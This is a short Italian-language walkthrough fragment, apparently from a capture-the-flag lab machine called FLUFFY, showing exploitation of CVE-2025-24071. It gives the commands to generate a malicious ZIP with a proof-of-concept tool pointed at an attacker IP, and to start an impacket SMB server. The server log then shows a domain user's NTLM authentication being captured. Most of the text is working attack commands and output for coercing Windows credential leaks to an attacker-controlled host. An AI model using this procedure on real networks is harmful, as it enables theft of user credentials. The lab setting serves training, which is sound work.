
Proof-of-concept exploit per CVE-2025-24071, che genera un file ZIP dannoso che attiva la divulgazione dell'hash NTLM tramite Esplora file di Windows, utilizzato con un server SMB per la cattura delle credenziali.
sudo apt update sudo apt install wine
wine CVE-2025-24071-POC.exe -i 10.10.14.8 -n try ZIP creato: try.zip
impacket-smbserver:
smbserver.py try /root/smbshare -smb2support -ip 10.10.14.8 -debug Impacket (Exegol fork) v0.13.0.dev0+20250723.125503.b5db2dd7 - Copyright Fortra, LLC and its affiliated companies
[+] Percorso di installazione libreria Impacket: /root/.local/share/pipx/venvs/impacket/lib/python3.11/site-packages/impacket [] File di configurazione analizzato [] Callback aggiunto per UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [] Callback aggiunto per UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [] File di configurazione analizzato [] File di configurazione analizzato [] File di configurazione analizzato [] Connessione in ingresso (10.129.232.88,51127) [] AUTHENTICATE_MESSAGE (FLUFFY\p.agila,DC01) [*] Utente DC01\p.agila autenticato con successo